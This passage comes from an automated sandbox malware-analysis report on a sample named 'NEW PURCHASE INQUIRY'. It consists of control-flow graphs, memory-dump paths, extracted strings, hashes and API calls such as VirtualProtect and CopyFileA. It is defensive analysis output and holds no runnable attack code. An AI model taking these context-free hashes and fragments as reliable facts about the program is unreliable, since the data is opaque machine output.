2071->2078 2072->2073 2081 694eaf0-694eafa 2072->2081 2077->2062 2078->2077 2084 694eafc-694eb0b 2081->2084 2085 694eb0d-694eb1d 2081->2085 2084->2085 2089->2008 2090->2008 2091->2008 2092->2008 2093->2070 2094->2070 2095->2070
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (nq$d
                                        • API String ID: 0-2356140993
                                        • Opcode ID: 3fe7740c2e729ddb68b1469da8b7622ec143bca1d159d8d7b5623d13d13b6774
                                        • Instruction ID: 753580e3f529e4636fa4b97b46ae9fa109910c6f002f66343e03fb32e38cc3c0
                                        • Opcode Fuzzy Hash: 3fe7740c2e729ddb68b1469da8b7622ec143bca1d159d8d7b5623d13d13b6774
                                        • Instruction Fuzzy Hash: A2D17B307006168FCB54DF28C484D6ABBF6FF89310B258969E55A8B7A5DB31FC46CB90

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2096 6813ee8-6813f0d 2097 6813f14-6813f31 2096->2097 2098 6813f0f 2096->2098 2099 6813f33-6813f3c 2097->2099 2100 6813f52 2097->2100 2098->2097 2102 6813f43-6813f46 2099->2102 2103 6813f3e-6813f41 2099->2103 2101 6813f55-6813f59 2100->2101 2104 6814174-681418b 2101->2104 2105 6813f50 2102->2105 2103->2105 2107 6814191-6814195 2104->2107 2108 6813f5e-6813f62 2104->2108 2105->2101 2111 6814197-68141bc 2107->2111 2112 68141bf-68141c3 2107->2112 2109 6813f64-6814002 2108->2109 2110 6813f6a-6813f6e 2108->2110 2121 6814004-68140a2 2109->2121 2122 681400a-681400e 2109->2122 2116 6813f70-6813f95 2110->2116 2117 6813f98-6813fbd 2110->2117 2111->2112 2113 68141c5-68141ce 2112->2113 2114 68141e4 2112->2114 2118 68141d0-68141d3 2113->2118 2119 68141d5-68141d8 2113->2119 2120 68141e7-68141ed 2114->2120 2116->2117 2140 6813fbf-6813fc8 2117->2140 2141 6813fde 2117->2141 2124 68141e2 2118->2124 2119->2124 2130 68140a4-681413f 2121->2130 2131 68140aa-68140ae 2121->2131 2127 6814010-6814035 2122->2127 2128 6814038-681405d 2122->2128 2124->2120 2127->2128 2156 681405f-6814068 2128->2156 2157 681407e 2128->2157 2143 6814141-6814166 2130->2143 2144 6814169-681416c 2130->2144 2134 68140b0-68140d5 2131->2134 2135 68140d8-68140fd 2131->2135 2134->2135 2168 68140ff-6814108 2135->2168 2169 681411e 2135->2169 2146 6813fca-6813fcd 2140->2146 2147 6813fcf-6813fd2 2140->2147 2148 6813fe1-6813fe8 2141->2148 2143->2144 2144->2104 2153 6813fdc 2146->2153 2147->2153 2154 6813ff8-6813ff9 2148->2154 2155 6813fea-6813ff0 2148->2155 2153->2148 2154->2104 2155->2154 2162 681406a-681406d 2156->2162 2163 681406f-6814072 2156->2163 2164 6814081-6814088 2157->2164 2170 681407c 2162->2170 2163->2170 2165 6814098-6814099 2164->2165 2166 681408a-6814090 2164->2166 2165->2104 2166->2165 2171 681410a-681410d 2168->2171 2172 681410f-6814112 2168->2172 2173 6814121-6814128 2169->2173 2170->2164 2176 681411c 2171->2176 2172->2176 2177 6814138-6814139 2173->2177 2178 681412a-6814130 2173->2178 2176->2173 2177->2104 2178->2177
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202531116.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6810000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'jq$4'jq
                                        • API String ID: 0-1204115232
                                        • Opcode ID: dd9a2ec970f45891091409e39a5b7f17bd80e8043720d4b74e4fa35f8098cdd7
                                        • Instruction ID: e878f9ea48eb61bcf73dfd4066731311f9a49f4d01c84bc5c13f9017ddebe115
                                        • Opcode Fuzzy Hash: dd9a2ec970f45891091409e39a5b7f17bd80e8043720d4b74e4fa35f8098cdd7
                                        • Instruction Fuzzy Hash: 39A1F474E0021DDFDB94DFA9D448AADBBB6FF88301F108029E916AB390C7755986CF90

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2179 12247e8 2180 1224870-1224889 2179->2180 2182 1224811-122482a 2180->2182 2183 122488b-12248b2 2180->2183 2186 1224854 2182->2186 2187 122482c-1224838 2182->2187 2188 12248b8-12248c1 2183->2188 2189 12247f9-1224802 2183->2189 2192 122485a-122486b 2186->2192 2190 1224842-1224848 2187->2190 2191 122483a-1224840 2187->2191 2188->2189 2193 1224804 2189->2193 2194 122480b-122480c 2189->2194 2195 1224852 2190->2195 2191->2195 2196 12247ed-12247f3 2192->2196 2193->2180 2193->2182 2193->2194 2197 12248c6-12248d8 2193->2197 2198 1224a24-1224a38 2193->2198 2199 1224b4b-1224b5f 2193->2199 2200 1224968-1224984 2193->2200 2201 122486d-122486e 2193->2201 2202 1224936-1224952 2193->2202 2203 122499a-12249da 2193->2203 2204 12249df-1224a1f 2193->2204 2205 12248dd-1224920 2193->2205 2206 1224a3d 2193->2206 2194->2199 2195->2192 2196->2189 2197->2189 2207 1224b61-1224b9e 2198->2207 2199->2207 2200->2197 2216 122498a-1224995 2200->2216 2201->2180 2202->2180 2215 1224958-1224963 2202->2215 2203->2189 2204->2189 2205->2180 2228 1224926-1224931 2205->2228 2212 1224a49-1224b35 2206->2212 2224 1224ba0-1224bab 2207->2224 2225 1224bad-1224bb6 2207->2225 2212->2189 2244 1224b3b-1224b46 2212->2244 2215->2196 2216->2189 2224->2225 2226 1224bb8 2225->2226 2227 1224bbf-1224bc0 2225->2227 2226->2227 2230 1224bc2-1224bc9 2226->2230 2231 1224c18 2226->2231 2232 1224bff-1224c16 2226->2232 2227->2232 2228->2189 2230->2231 2233 1224bcb-1224bf2 2230->2233 2232->2225 2233->2225 2237 1224bf4-1224bfd 2233->2237 2237->2225 2244->2189
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2180610051.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1220000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PHjq$`Qjq
                                        • API String ID: 0-1536342408
                                        • Opcode ID: cb248e09d67cb80c0f6a65f78c3f3fb360c28f33c1799d9b4b8df72c1952203b
                                        • Instruction ID: dd4f7105c23f650aa35b62a912689c635b5ffd5490b1c37d3a045703e18ff98c
                                        • Opcode Fuzzy Hash: cb248e09d67cb80c0f6a65f78c3f3fb360c28f33c1799d9b4b8df72c1952203b
                                        • Instruction Fuzzy Hash: DDB1C474E102A9DFDB24EF25D9987EDBBB1AB49305F1040EAD509A6690DBB41EC4CF02

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2245 694d160-694d198 2247 694d284-694d2a9 2245->2247 2248 694d19e-694d1a2 2245->2248 2255 694d2b0-694d2d4 2247->2255 2249 694d1a4-694d1b0 2248->2249 2250 694d1b6-694d1ba 2248->2250 2249->2250 2249->2255 2251 694d1c0-694d1d7 2250->2251 2252 694d2db-694d300 2250->2252 2263 694d1d9-694d1e5 2251->2263 2264 694d1eb-694d1ef 2251->2264 2273 694d307-694d35a 2252->2273 2255->2252 2263->2264 2263->2273 2267 694d1f1-694d20a 2264->2267 2268 694d21b-694d234 2264->2268 2267->2268 2277 694d20c-694d20f 2267->2277 2278 694d236-694d25a 2268->2278 2279 694d25d-694d281 2268->2279 2288 694d392-694d3b7 2273->2288 2289 694d35c-694d37c 2273->2289 2282 694d218 2277->2282 2282->2268 2296 694d3be-694d412 2288->2296 2289->2296 2297 694d37e-694d38f 2289->2297 2303 694d418-694d424 2296->2303 2304 694d4b9-694d507 2296->2304 2307 694d426-694d42d 2303->2307 2308 694d42e-694d442 2303->2308 2316 694d537-694d53d 2304->2316 2317 694d509-694d52d 2304->2317 2311 694d444-694d469 2308->2311 2312 694d4b1-694d4b8 2308->2312 2323 694d4ac-694d4af 2311->2323 2324 694d46b-694d485 2311->2324 2319 694d54f-694d55e 2316->2319 2320 694d53f-694d54c 2316->2320 2317->2316 2318 694d52f 2317->2318 2318->2316 2323->2311 2323->2312 2324->2323 2326 694d487-694d490 2324->2326 2327 694d492-694d495 2326->2327 2328 694d49f-694d4ab 2326->2328 2327->2328
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (nq$(nq
                                        • API String ID: 0-2974481825
                                        • Opcode ID: 745b7fa1948b86c93c8ff964c31fabb8855ca41ee5d98d3e25efd72589c76673
                                        • Instruction ID: f99f054bb7f0973e9bd515a946186c0395ae07fff146c6975d48dff66a8a47d8
                                        • Opcode Fuzzy Hash: 745b7fa1948b86c93c8ff964c31fabb8855ca41ee5d98d3e25efd72589c76673
                                        • Instruction Fuzzy Hash: CF51CD317002058FCB559F68D854AAE3BAAEF85310F248569E906CB392CF39DC8AC791

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2329 6a7fb10-6a7fb22 2330 6a7fc16-6a7fc3b 2329->2330 2331 6a7fb28-6a7fb2a 2329->2331 2332 6a7fc42-6a7fc66 2330->2332 2331->2332 2333 6a7fb30-6a7fb3c 2331->2333 2345 6a7fc6d-6a7fc91 2332->2345 2338 6a7fb50-6a7fb60 2333->2338 2339 6a7fb3e-6a7fb4a 2333->2339 2344 6a7fb66-6a7fb74 2338->2344 2338->2345 2339->2338 2339->2345 2349 6a7fb7a-6a7fb7f 2344->2349 2350 6a7fc98-6a7fd1b 2344->2350 2345->2350 2383 6a7fb81 call 6a7fd00 2349->2383 2384 6a7fb81 call 6a7fb00 2349->2384 2385 6a7fb81 call 6a7fb10 2349->2385 2373 6a7fd22-6a7fd30 call 6a7ee50 2350->2373 2374 6a7fd1d call 6a7cba8 2350->2374 2353 6a7fb87-6a7fbb1 2362 6a7fbb9-6a7fbd0 2353->2362 2367 6a7fbf3-6a7fc13 call 6a7dc50 2362->2367 2368 6a7fbd2-6a7fbeb 2362->2368 2368->2367 2379 6a7fd32-6a7fd38 2373->2379 2380 6a7fd48-6a7fd4a 2373->2380 2374->2373 2381 6a7fd3c-6a7fd3e 2379->2381 2382 6a7fd3a 2379->2382 2381->2380 2382->2380 2383->2353 2384->2353 2385->2353
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (nq$Hnq
                                        • API String ID: 0-3116299003
                                        • Opcode ID: 9e73f77ba3ea1f865f867cbb4e1c2a401fe1299c040820da91d20c0039e02800
                                        • Instruction ID: 65724fbf47433b55666f6605486b454b1dc72f806840de38f07a9fe3c8c0d984
                                        • Opcode Fuzzy Hash: 9e73f77ba3ea1f865f867cbb4e1c2a401fe1299c040820da91d20c0039e02800
                                        • Instruction Fuzzy Hash: 8251AB30B002108FC799AF78C85466E7BE7EFC5301B154869D906DB3A5DE35ED4AC791

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2386 694b743-694bdd7 2389 694b767-694b82d 2386->2389 2390 694bddd-694bde5 2386->2390 2411 694b857 2389->2411 2412 694b82f-694b83b 2389->2412 2391 694b220-694b226 2390->2391 2392 694b22f-694b9b1 2391->2392 2393 694b228-694b6c0 2391->2393 2398 694b9b3 2392->2398 2399 694b9ba-694b9c2 2392->2399 2400 694b6c2 2393->2400 2401 694b6c9-694b6e2 2393->2401 2398->2399 2402 694bc67-694bc9c 2398->2402 2403 694bb7a-694bbaf 2398->2403 2399->2391 2400->2401 2401->2391 2406 694b6e8-694b6f0 2401->2406 2402->2391 2405 694bca2-694bcaa 2402->2405 2403->2391 2405->2391 2406->2391 2415 694b85d-694b8a8 2411->2415 2413 694b845-694b84b 2412->2413 2414 694b83d-694b843 2412->2414 2416 694b855 2413->2416 2414->2416 2419 694b8b4-694b963 2415->2419 2416->2415 2419->2391 2423 694b969-694b971 2419->2423 2423->2391
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %$d%pq
                                        • API String ID: 0-1344102625
                                        • Opcode ID: b5abb3685926dd4d0840a0612f3c27cfa9a7e43f643a6d3f6a093bfdd201217d
                                        • Instruction ID: edba4385dcc6b36163f20eef48c9659edb1a39b661eee95ba2e6b32d14331905
                                        • Opcode Fuzzy Hash: b5abb3685926dd4d0840a0612f3c27cfa9a7e43f643a6d3f6a093bfdd201217d
                                        • Instruction Fuzzy Hash: 0F510470A002698FDBA4DF68C944BAEB7F1FB49300F5185AAD50AE7755DB309E82CF50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2424 6944e50-6945eed 2427 6945ef3-6945f12 2424->2427 2428 694612b-6946130 2424->2428 2429 6944c84-6944c8c 2427->2429 2430 6945f18-6945f20 2427->2430 2431 694613a-694614c call 6946780 2428->2431 2432 6944c95-6944e22 2429->2432 2433 6944c8e-6944ed0 2429->2433 2430->2429 2435 6946152-6946171 2431->2435 2436 6944e24 2432->2436 2437 6944e29-6944e38 2432->2437 2439 6944ed6-6944efa 2433->2439 2440 6944ed2 2433->2440 2436->2437 2437->2429 2439->2429 2442 6944f00-6944f08 2439->2442 2440->2439 2442->2429
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: +$h
                                        • API String ID: 0-2044229855
                                        • Opcode ID: c4e9f61a793eb05c07ca9efca7ab726d945891c52d5a750ceed64772ed1650fc
                                        • Instruction ID: 8708f0baa09cd552c77213315f850db0996ac3bf390754bc063de83a36622b5e
                                        • Opcode Fuzzy Hash: c4e9f61a793eb05c07ca9efca7ab726d945891c52d5a750ceed64772ed1650fc
                                        • Instruction Fuzzy Hash: 9B015A709141088FDF40EF58E884F9973B5FB06309F0196A5E11AA7685CB355D59CF45

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2444 69460bf-69460c4 2445 69460c6 2444->2445 2446 69460ca 2444->2446 2445->2446 2447 6946133-694614c call 6946780 2446->2447 2448 69460cc-69460d6 2446->2448 2450 6946152-6946171 2447->2450 2448->2447
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: )$h
                                        • API String ID: 0-2052893873
                                        • Opcode ID: 9d1aa73fc1c7af47fc8584b4caf74f5702aad5cc87db014ed87bf4d27a8e95b2
                                        • Instruction ID: 82528683985d599dcc2d9253ec519ac3e37892b274c621c5d0ad399e7a6b308f
                                        • Opcode Fuzzy Hash: 9d1aa73fc1c7af47fc8584b4caf74f5702aad5cc87db014ed87bf4d27a8e95b2
                                        • Instruction Fuzzy Hash: 7DF05E705142958FDB45EF28E944F897BB9EB07309F059395D00097255CB385D49CF89
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,nq
                                        • API String ID: 0-1069744364
                                        • Opcode ID: aa07e9743e52c4d16658824110163ca67eec67d4a75bb558a9b106f4b1069eb3
                                        • Instruction ID: 24af02414faa095c76b1bc4033363cde998394d02a8b968ac11ca00d6f2aac45
                                        • Opcode Fuzzy Hash: aa07e9743e52c4d16658824110163ca67eec67d4a75bb558a9b106f4b1069eb3
                                        • Instruction Fuzzy Hash: CE521875A002288FDB64CF68C985BEDBBF6BF88300F1581D9E509A7351DA309E85CF61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (_jq
                                        • API String ID: 0-2603807687
                                        • Opcode ID: 26a577f6a748e32c75ea93c11207252d7ae120d079c56d4de4f68afb134d84ca
                                        • Instruction ID: 0ba1594373d3bee4f621128d9c709de5b269066e7a3258bce80028ccbb52e438
                                        • Opcode Fuzzy Hash: 26a577f6a748e32c75ea93c11207252d7ae120d079c56d4de4f68afb134d84ca
                                        • Instruction Fuzzy Hash: E1227A35A01204DFDB54DFA8D490AADB7F6EF88300F258069E906EB3A1DB75ED41CB91
                                        APIs
                                        • CopyFileA.KERNEL32(?,?,?), ref: 05BDCB85
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2200546787.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5bd0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID: CopyFile
                                        • String ID:
                                        • API String ID: 1304948518-0
                                        • Opcode ID: c2b564ed47b9908dd576dc7d7978e209d495c60c1140132b023a0c8e474cdb3e
                                        • Instruction ID: fd6587031950aa95d43a42aad27e4ade16e5f75cac126e178f6b00ddbfb03339
                                        • Opcode Fuzzy Hash: c2b564ed47b9908dd576dc7d7978e209d495c60c1140132b023a0c8e474cdb3e
                                        • Instruction Fuzzy Hash: 03514971D006599FDB10CFA9C9457AEFFF2FF48310F148169E855A7284EB78A841CB91
                                        APIs
                                        • CopyFileA.KERNEL32(?,?,?), ref: 05BDCB85
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2200546787.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5bd0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID: CopyFile
                                        • String ID:
                                        • API String ID: 1304948518-0
                                        • Opcode ID: 7d57372cfedee51d5930323c5207166ebaa27595ebb7e9579276613b13c7a2d7
                                        • Instruction ID: 9fa3dcf89797989322db4519b9fd32da524dfeab391a36b480d58018a7012b35
                                        • Opcode Fuzzy Hash: 7d57372cfedee51d5930323c5207166ebaa27595ebb7e9579276613b13c7a2d7
                                        • Instruction Fuzzy Hash: 15513971D006599FDB10CFA9C9457AEFFF1FF48310F148169E815A7294E774A841CB91
                                        APIs
                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05BD3004
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2200546787.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5bd0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 7732405a2f3fbc9076a74ed8e6a00db61bce5b1ba6b38fe93a87b0affa9a6551
                                        • Instruction ID: c31f87d426cf65123cc7617d19dfb477dd2a754f65e57a81bec1304e6b3604fc
                                        • Opcode Fuzzy Hash: 7732405a2f3fbc9076a74ed8e6a00db61bce5b1ba6b38fe93a87b0affa9a6551
                                        • Instruction Fuzzy Hash: C62104B28002098FDB10DFAAC545BEEBBF5FF48320F14842AD469A7251D738A945DFA1
                                        APIs
                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 067E0714
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202408945.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_67e0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 5d1020b8478925947318718382b77957342d113f988aed211af68768d52678de
                                        • Instruction ID: b7ead425cdd153dab3cb4fbc0c6873df253ae13c2c716da46b86cfcc75d5eb37
                                        • Opcode Fuzzy Hash: 5d1020b8478925947318718382b77957342d113f988aed211af68768d52678de
                                        • Instruction Fuzzy Hash: F42135B1C002098FDB10DFAAC884AEEFBF5EF98310F10842AD459A3250D7799945CFA1
                                        APIs
                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05BD3004
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2200546787.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5bd0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 6a96d619c5e7073a601c3a36f5d49171e1b3dac62c4225014863622f46da1a23
                                        • Instruction ID: c828217852b4deb5785ec979d905cf3b371e3b326cd5571b98b93c77118fbac4
                                        • Opcode Fuzzy Hash: 6a96d619c5e7073a601c3a36f5d49171e1b3dac62c4225014863622f46da1a23
                                        • Instruction Fuzzy Hash: C72113B18002098FDB10DFAAC945BEEFBF5FF48320F10842AD559A7240DB78A944CFA1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2200546787.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5bd0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 12f40b5d5d21b94897bb4f5189da270a56104128d4509c88cc8a1a08841d7e8b
                                        • Instruction ID: 408e75a126c1c2eb5f86f9e7ff7f5a2f4e22336fa2b818f9364e96c3db2c4647
                                        • Opcode Fuzzy Hash: 12f40b5d5d21b94897bb4f5189da270a56104128d4509c88cc8a1a08841d7e8b
                                        • Instruction Fuzzy Hash: 131147B19003598EDB20DFAAC445AEEFBF9EF48710F14841AE455A7240DB38A984CBA4
                                        APIs
                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 067E0714
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202408945.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_67e0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 9557e529bfb446a26471b6a315e91cd4f0e3b07e1e2cc553ef93de60c0d75405
                                        • Instruction ID: 0ad1b6512305d7fac4b64a6df88a04ea09a46a89471c8ee1e82d338975a21a79
                                        • Opcode Fuzzy Hash: 9557e529bfb446a26471b6a315e91cd4f0e3b07e1e2cc553ef93de60c0d75405
                                        • Instruction Fuzzy Hash: 6E11F4B1D002099FCB10DFAAC984AAEFBF5FF48320F10842AD519A7250D779A944CFA1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2200546787.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5bd0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: de4417ee6b2e43392bd0de190841cd576a446ca9f02d00cd7ffa92a310f18814
                                        • Instruction ID: ab605c2054eef58b1a047b19edca3644912962e34f7d8c47a6ae98ebd2fd5177
                                        • Opcode Fuzzy Hash: de4417ee6b2e43392bd0de190841cd576a446ca9f02d00cd7ffa92a310f18814
                                        • Instruction Fuzzy Hash: 251137B19003498FDB10DFAAC445BEEFBF8EF48720F14841AD459A7240DB78A944CBA4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'jq
                                        • API String ID: 0-3676250632
                                        • Opcode ID: aba915e31824f5aeea92fd1729974776b5cbfcad9be0f906a522830055d288c3
                                        • Instruction ID: 5f91028d43014c1e2a0ccb106f8f502a6df6e435a2abec4a0eded6609ba5520a
                                        • Opcode Fuzzy Hash: aba915e31824f5aeea92fd1729974776b5cbfcad9be0f906a522830055d288c3
                                        • Instruction Fuzzy Hash: 3EB1F934A10228DFCB44EFA4D898D9DBBB6FF88300F158159E915AB765DB30EC46CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: f8cfe4cfb9c8a004ab276227fdc811a611f57d362c2a6f49d2b2d7a9efccacf6
                                        • Instruction ID: 9d7bbcda8033400b3a086f1dcc9ac0092d4e291691ef7ee13ce31b8d75653445
                                        • Opcode Fuzzy Hash: f8cfe4cfb9c8a004ab276227fdc811a611f57d362c2a6f49d2b2d7a9efccacf6
                                        • Instruction Fuzzy Hash: 4CA15B70D09209CFEB91EFAAC444BEEBBF5EB49344F109429D055A7A81C379498ACF91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Pljq
                                        • API String ID: 0-328474749
                                        • Opcode ID: a15bad9205a872f5128d08a5fcf4201dc8f010f952bcc8400556aa2dbf83cae1
                                        • Instruction ID: 84d48fa2902f48dcdf56ad514316d87a1e14bb64bed31e16ab5d8d0417a3156d
                                        • Opcode Fuzzy Hash: a15bad9205a872f5128d08a5fcf4201dc8f010f952bcc8400556aa2dbf83cae1
                                        • Instruction Fuzzy Hash: 8C912630B002158FCB54EF29C494A6E7BFABF89750B2540A9E505DB3B5DB71EC41CBA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (nq
                                        • API String ID: 0-2756854522
                                        • Opcode ID: 766ecbb090c26e9d1d28648152c3a51c6ab136f622be3bae87bece908a50c919
                                        • Instruction ID: 9a97dd7beb84e79adaecb7272bdf8c80c98af05adeca7fadb4326d8bb51ba867
                                        • Opcode Fuzzy Hash: 766ecbb090c26e9d1d28648152c3a51c6ab136f622be3bae87bece908a50c919
                                        • Instruction Fuzzy Hash: 44810631B002169FCB50DF69C844AAABBF6FF89320F158566E956DB281D730EC42CBD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (nq
                                        • API String ID: 0-2756854522
                                        • Opcode ID: e4c00b30cdd6dea45bc26773e24c9e60c1cd68080222992d85edac68ad621128
                                        • Instruction ID: aed97a1f00c0815edf612bf7608d6fc9232f2e86b57781d2cf6da522197225c1
                                        • Opcode Fuzzy Hash: e4c00b30cdd6dea45bc26773e24c9e60c1cd68080222992d85edac68ad621128
                                        • Instruction Fuzzy Hash: CF717A30F006198FCB54DBA9C9406AFBBF6FFC8310F248969D55AA7754EB31AD028B51
                                        Strings
                                        Memory Dump Source
